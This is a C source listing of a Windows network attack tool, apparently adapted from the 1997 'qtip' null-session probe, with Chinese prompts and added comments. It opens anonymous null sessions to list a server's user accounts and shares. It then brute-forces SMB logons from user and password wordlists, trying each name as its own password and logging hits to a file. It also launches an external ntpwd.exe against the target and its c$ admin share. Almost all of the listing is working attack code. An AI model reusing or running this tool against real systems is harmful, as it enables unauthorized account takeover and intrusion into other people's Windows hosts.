//建立空连接,是为了列举用户,然后使用WNetAddConnection2暴力猜解口令。
///////////////////////////////////////////////////////////////////////
///////////////////////.h//////////////////////////////////////////
/*
* qtip.h
* 12/04/1997
* twitch
* twitch@aye.net
*
* a quick nt investigative probe. (mis)uses null sessions to collect
* sundry information about a WindowsNT server. distribute as you
* please. be alert, look alive, and act like you know.
*
* '...i should dismiss him, in order to teach him that pleasure consists
* not in what i enjoy, but in having my own way.'
* -sk, either/or
*/
#include <stdio.h>
#include <windows.h>
#include <winnetwk.h>
#include "lm.h"
#include <wchar.h>
/* Buffer sizes shared by the globals and functions below. */
#define k16 16384          /* bytes malloc'd as the pointer slot in procure_userlist() */
#define TARG_LEN 255       /* element count of target[] (char) and utarg[] (WCHAR) */
#define USER_LEN 22        /* element count of user[] (WCHAR), filled by an unbounded wcscpy() */
/*
 * Prototypes. handle_error, prepend_str, parse_cl, usage, bail and
 * get_usr_info are declared here but not defined anywhere in this listing
 * (presumably leftovers from the original qtip.h or defined elsewhere).
 * procure_sharelist is declared twice.
 */
void handle_error(DWORD);
void prepend_str(char *, char*);
int open_session();
int procure_userlist();
int procure_sharelist();
void parse_cl(int, char **);
void usage(char *);
int powerup();
void bail(const char *);
int close_session();
void get_usr_info(wchar_t *);
int procure_sharelist();
int getpasswd(char addr[60],char name[20],char passwdtxt[20],char ok[20]);
/* couple o globals to make my life easier */
/*
 * Option flags. Nothing in this listing assigns them, so as file-scope
 * objects they start at zero: the VERB-guarded progress messages never
 * print and close_session() always cancels the connection, unless code
 * outside this listing (e.g. the undefined parse_cl) sets them.
 * u_int presumably comes from the Windows networking headers.
 */
u_int OPT_SHARES, OPT_USERS, OPT_GETUI;
u_int OPT_NODEL, VERB;
/* UNC name of the host being probed; main() overwrites it from argv[] with an unbounded strcpy(). */
char target[TARG_LEN]="\\\\192.168.0.1";
/* Wide-char copy of target, produced by powerup() for NetUserEnum(). */
WCHAR utarg[TARG_LEN];
/* Scratch copy of one enumerated account name (procure_userlist()). */
WCHAR user[USER_LEN];
/* Shared NETRESOURCE filled in by open_session() and procure_sharelist(); lpRemoteName points at target. */
NETRESOURCE nr;
/* Local device getpasswd() maps each guessed connection onto. */
#define LOCALDRIVE "x:"
////.cpp////////////////////////////////////////////////
#include "1.h"
/*
 * Defaults for the guessing loop in main(): one account name per line in
 * usertxt, one candidate password per line in passwdtxt, successful pairs
 * appended to ok. argv[2..4] may override the three file names (20-byte
 * buffers, copied with unbounded strcpy()). name/nameid hold the line
 * currently being processed.
 */
char name[20],nameid[20],usertxt[20]="user.txt",passwdtxt[20]="passwd.txt",ok[20]="ok.txt";
/* Handle for the user list opened by main(). */
FILE *stream1;
/* Last remote name seen by procure_sharelist(); reused by main() in the "a" mode. */
char share[50];
/*
 * Entry point. Behaviour depends on argc:
 *   1  - print usage (Chinese) and exit.
 *   2  - argv[1] is the target UNC name: open a null session, dump the
 *        account list (user.txt) and share list (share.txt), disconnect.
 *   >2 - argv[1] is the target, argv[2] selects a mode:
 *        "a"    run the external ntpwd.exe against the target, then against
 *               the last share procure_sharelist() found;
 *        "s"    run ntpwd.exe against the target, then against <target>\c$;
 *        "l"    keep the default file names;
 *        other  argv[2..4] are the user list, password list and output file.
 *        Except for "a"/"s", every line of the user list is then handed to
 *        getpasswd().
 * Returns 1 when powerup()/open_session()/procure_sharelist() fail, 0
 * otherwise; several paths call exit(0) instead of returning.
 */
int main(int argc, char *argv[])
{
if(argc==1){
printf("使用:");
printf("\n程序名 \\\\网络地址 列出用户");
printf("\n程序名 \\\\网络地址\\共享驱动器 用户文件 密码文件 输出文件 查找密码\n");
exit (0);
}
if(argc==2){
/* unbounded copy into the TARG_LEN (255) byte global; an over-long argv[1] overruns it */
strcpy(target, argv[argc - 1]);
if( (powerup()) )
return(1);
if( (open_session()) != 0)
return(1);
/* return value ignored; procure_userlist() always returns 0 anyway */
procure_userlist();
if(procure_sharelist()!=0)
return(1);
close_session();
}
if(argc>2)
{
strcpy(target, argv[1]);
printf("%s\n",argv[2]);
if(strcmp( argv[2], "a" )==0)
{
/* 50-byte command buffer filled by unbounded sprintf(); target or share can exceed it.
 * system() passes argv-derived text to the shell; ntpwd.exe is not part of this listing. */
char run[50]="";
sprintf(run,"ntpwd.exe %s",target);
system(run);
/* no open_session() on this path; procure_sharelist() works on the global nr directly */
if(procure_sharelist()!=0)
return(1);
/* share[] holds the last lpRemoteName procure_sharelist() wrote */
sprintf( run, "ntpwd.exe %s l",share);
system(run);
exit(0);
}
if(strcmp( argv[2], "s" )==0)
{
char run[50]="";
sprintf(run,"ntpwd.exe %s",target);
system(run);
/* second invocation names the administrative share of the same host (unbounded strcat) */
strcat(run,"\\c$ l");
system(run);
exit(0);
}
/* any argv[2] other than "l" is taken as the user-list file name */
if(strcmp( argv[2], "l" )!=0){
/* unbounded copies into 20-byte globals */
strcpy(usertxt, argv[2]);
if(argc>3)
strcpy(passwdtxt, argv[3]);
if(argc>4)
strcpy(ok, argv[4]);
}
printf("%s %s %s\n",usertxt,passwdtxt,ok);
stream1=fopen(usertxt,"r");
if(stream1==NULL){
printf("文件名错误!!\n");exit(0);
}
printf("请等待。。。。。。\n");
/* one account name per line; fgets() reads at most 19 chars, so a longer line
 * is consumed in pieces and each piece is treated as a separate name */
while(fgets(name,20,stream1)!=NULL){
/* strncpy from "" zero-fills nameid, which is what keeps the partial copy below NUL-terminated */
strncpy( nameid, "", 20);
/* drops the last char, assumed to be the newline; a final line without one loses a real character */
strncpy( nameid, name, strlen(name)-1 );
strncpy( name, "", 20);
/* -1 is getpasswd()'s "cannot reach the target" result: stop the whole run */
if(getpasswd(target,nameid,passwdtxt,ok)==-1){
fclose(stream1);
exit(0);
/* unreachable: exit() above never returns, so this message is never printed */
printf("...无法连接...\n");
}
}
fclose(stream1);
}
return(0);
}
/*
 * open_session()
 * Connects to the global target with an empty user name and an empty
 * password (a null session) through the global nr.
 * Returns 0 on NO_ERROR and -1 for any other WNetAddConnection2() result;
 * the error code itself is discarded. VERB is never set in this listing,
 * so the progress messages are normally silent.
 */
int open_session()
{
DWORD r;
/* only these four fields are set; the remaining members keep whatever the global nr holds */
nr.dwType = RESOURCETYPE_ANY;
nr.lpLocalName = NULL;    /* no local device is redirected */
nr.lpProvider = NULL;
nr.lpRemoteName = target;
if(VERB)
printf("establishing null session with %s...\n", target);
/* argument order is (resource, password, user, flags): both credentials are "" */
r = WNetAddConnection2(&nr, "", "", 0);
if(r != NO_ERROR){
return -1;
}
if(VERB)
printf("connection established\n");
return 0;
}
/*
* procure_userlist()
* just use the old lm NetUserEnum() because there isn't comparable
* functionality in the WNet sect. i just wish the win32 api was
* more bloated and obtuse.
*/
/*
 * procure_userlist()
 * Enumerates the accounts on utarg with NetUserEnum() at info level 0
 * (name only) over the session opened by open_session(), prints each name
 * and writes it, one per line, to user.txt in the current directory.
 * Always returns 0, even when the enumeration or an allocation fails.
 */
int procure_userlist()
{
NET_API_STATUS nas;
/* pointer slot that NetUserEnum() fills with the address of the buffer it allocates */
LPBYTE *buf = NULL;
DWORD entread, totent, rhand;
/* 0xffffffff is MAX_PREFERRED_LENGTH: let the API size the result buffer itself */
DWORD maxlen = 0xffffffff;
USER_INFO_0 *usrs;
unsigned int i;
int cc = 0;
entread = totent = rhand = nas = 0;
/* k16 bytes are allocated but only the first pointer-sized slot (*buf) is used;
 * on malloc failure execution continues and NetUserEnum() is called with buf == NULL */
if( (buf = (LPBYTE*)malloc(k16)) == NULL)
printf("malloc probs");
if(VERB)
wprintf(L"\ngetting userlist from %s...\n", utarg);
nas = NetUserEnum(utarg, 0, 0, buf, maxlen, &entread, &totent, &rhand);
if(nas != NERR_Success){
fprintf(stderr, "couldnt enum users, ");
goto cleanup;
}
/* copy the entread USER_INFO_0 records out of the API buffer */
cc = sizeof(USER_INFO_0) * entread;
if( (usrs = (USER_INFO_0 *)malloc(cc)) == NULL){
fprintf(stderr, "malloc probs\n");
goto cleanup;
}
FILE *stream;
stream=fopen("user.txt","w");
/* the usri0_name pointers inside usrs still point into the API buffer (*buf) */
memcpy(usrs, *buf, cc);
if(stream!=NULL){
for(i = 0; i < entread; i++){
/* user[] is USER_LEN (22) WCHARs; wcscpy() does not bound the copy */
wcscpy(user, usrs[i].usri0_name);
wprintf(L"%s\n", user);
fputws(user,stream);
fputs("\n",stream);
// if(VERB)
// get_usr_info(utarg);
}}
/* runs even when fopen() failed (stream == NULL) */
fclose(stream);
cleanup:
/* frees the pointer slot only; usrs and the API-owned buffer (*buf, to be
 * released with NetApiBufferFree()) are not freed in this function */
if(buf)
free(buf);
return 0;
}
/*
 * close_session()
 * Tears down the connection made by open_session() unless OPT_NODEL is set.
 * Returns 0 on success, -1 if WNetCancelConnection2() reports an error.
 * Note: r is assigned only inside the !OPT_NODEL branch, so with OPT_NODEL
 * set the comparison below reads an uninitialized DWORD.
 */
int close_session()
{
DWORD r;
/* no matching WSAStartup() appears anywhere in this listing */
WSACleanup();
/* TRUE forces the disconnect even if the connection is in use */
if(!OPT_NODEL)
r = WNetCancelConnection2(target, 0, TRUE);
if(r != 0){
fprintf(stderr, "couldnt delete %s, returned %d\n", target, r);
return -1;
}
else{
if(VERB)
printf("connection to %s deleted\n", target);
}
return 0;
}
/*
 * powerup()
 * Builds utarg, the wide-char copy of the ANSI target used by NetUserEnum().
 * Returns 0 on success, -1 if MultiByteToWideChar() converts nothing.
 * Notes: ZeroMemory() is given TARG_LEN bytes, i.e. only half of the
 * TARG_LEN-element WCHAR array; the conversion is passed cc input bytes
 * and cc output WCHARs (the terminator is not included), so utarg relies
 * on the zeroed tail for its NUL — fine for short names, not guaranteed
 * once the name approaches TARG_LEN/2 characters.
 */
int powerup()
{
int cc = 0, ucc = 0;
ZeroMemory(utarg, TARG_LEN);
cc = strlen(target);
ucc = MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, target, cc, utarg, cc);
if(ucc < 1){
return -1;
}
return 0;
}
/*
 * getpasswd()
 * Password guessing for one account. Tries to map LOCALDRIVE to addr with
 * WNetAddConnection2() (argument order: resource, password, user, flags),
 * first with the account name as its own password, then with each line
 * of passwdtxt (at most 9 chars per fgets() read; longer lines are split
 * across iterations). The first logon that succeeds is printed, appended
 * to the ok file as "<name> 密码是: <password>", the mapping is cancelled
 * and 0 is returned.
 * Returns -1 without trying the list when the very first attempt fails
 * with Win32 error 53 or 240 (ERROR_BAD_NETPATH / ERROR_VC_DISCONNECTED —
 * confirm against winerror.h); inside the loop those codes are not
 * distinguished. Returns 0 otherwise, hit or not.
 * The array sizes in the parameter list are documentation only; the
 * parameters are plain pointers.
 */
int getpasswd(char addr[60],char name[20],char passwdtxt[20],char ok[20])
{
char passwd[10],passwdid[10];
FILE *stream2,*stream;
/* local NETRESOURCE, distinct from the global nr; its other members stay uninitialized */
NETRESOURCE nr; DWORD ret;
nr.lpProvider = NULL;
nr.dwType = RESOURCETYPE_ANY ;
nr.lpLocalName = LOCALDRIVE;    /* every successful guess maps drive x: */
nr.lpRemoteName = addr;
/* attempt 1: password == user name */
ret=WNetAddConnection2(&nr,name,name,0);
if(ret==240)return -1;
if(ret==53)return -1;
/* fopen() result is not checked before the fputs() calls */
if(ret ==NO_ERROR) {stream=fopen(ok,"a");
printf("取得:%s 的密码是: %s \n", name, name);
/* release the mapping so x: is free for the next call */
WNetCancelConnection2(LOCALDRIVE,0,TRUE);
fputs(name,stream);
fputs(" 密码是: ",stream);
fputs(name,stream);
fputs("\n",stream);
fclose(stream);
return 0;
}
/* attempts 2..n: every line of the password file; a NULL stream2 (missing file) is not checked */
stream2=fopen(passwdtxt,"r");
while(fgets(passwd,10,stream2)!=NULL){
/* zero-fill, then copy without the trailing newline (same idiom as main()) */
strncpy( passwdid, "", 10);
strncpy( passwdid, passwd, strlen(passwd)-1);
strncpy( passwd, "", 10);
printf("%s %s \n", name, passwdid);
ret=WNetAddConnection2(&nr,passwdid,name,0);
/* fopen() result is again unchecked */
if(ret ==NO_ERROR) {stream=fopen(ok,"a");
printf("取得:%s 的密码是: %s \n", name, passwdid);
WNetCancelConnection2(LOCALDRIVE,0,TRUE);
fputs(name,stream);
fputs(" 密码是: ",stream);
fputs(passwdid,stream);
fputs("\n",stream);
fclose(stream);
return 0;
}
}fclose(stream2);
return 0;
}
/*
 * procure_sharelist()
 * Lists the connectable resources published by the global target through
 * WNetOpenEnum()/WNetEnumResource(), prints each remote name, writes them
 * one per line to share.txt and leaves the last one in the global share[].
 * The global nr is used as the container to enumerate, so its lpRemoteName
 * is set to target. Returns 0 on success, -1 on allocation or enumeration
 * failure.
 */
int procure_sharelist()
{
DWORD r;
/* 16 KiB result buffer; cnt == 0xFFFFFFFF asks for as many entries as fit */
DWORD bufsize = 16384, cnt = 0xFFFFFFFF;
HANDLE enhan;
void *buf;
NETRESOURCE *res;
u_int i;
if( (buf = malloc(bufsize)) == NULL){
return -1;
}
nr.dwScope = RESOURCE_CONNECTED;
nr.dwType = RESOURCETYPE_ANY;
nr.dwDisplayType = 0;
nr.dwUsage = RESOURCEUSAGE_CONTAINER;
nr.lpLocalName = NULL;
nr.lpRemoteName = (LPTSTR)target;    /* the cast suggests a non-UNICODE (ANSI) build */
nr.lpComment = NULL;
nr.lpProvider = NULL;
r = WNetOpenEnum(RESOURCE_GLOBALNET, RESOURCETYPE_ANY,
RESOURCEUSAGE_CONNECTABLE, &nr
, &enhan);
if(r != 0){
free(buf);
return -1;
}
/* on return cnt holds the number of NETRESOURCE records placed in buf; any nonzero
 * status (ERROR_NO_MORE_ITEMS included, presumably) is reported as "no share".
 * enhan is never closed — there is no WNetCloseEnum() call in this function */
r = WNetEnumResource(enhan, &cnt, buf, &bufsize);
if(r != 0){
free(buf);
printf("no share\n");
return -1;
}
/* copy of the record array; the string pointers inside still reference buf,
 * which is why buf is freed only at the very end */
res = (NETRESOURCE*)malloc(cnt * sizeof(NETRESOURCE));
if(res == NULL){
free(buf);
return -1;
}
memcpy(res, buf, (cnt * sizeof(NETRESOURCE)) );
FILE *stream;
stream=fopen("share.txt","w");
if(stream!=NULL){
for(i = 0; i < cnt; i++){
printf("%s\n", res[i].lpRemoteName);
/* unbounded sprintf() into the 50-byte global share[]; a long name overruns it */
sprintf(share,"%s",res[i].lpRemoteName);
fputs(res[i].lpRemoteName,stream);
fputs("\n",stream);
}
}
/* runs even when fopen() failed (stream == NULL) */
fclose(stream);
free(buf);
free(res);
return 0;
}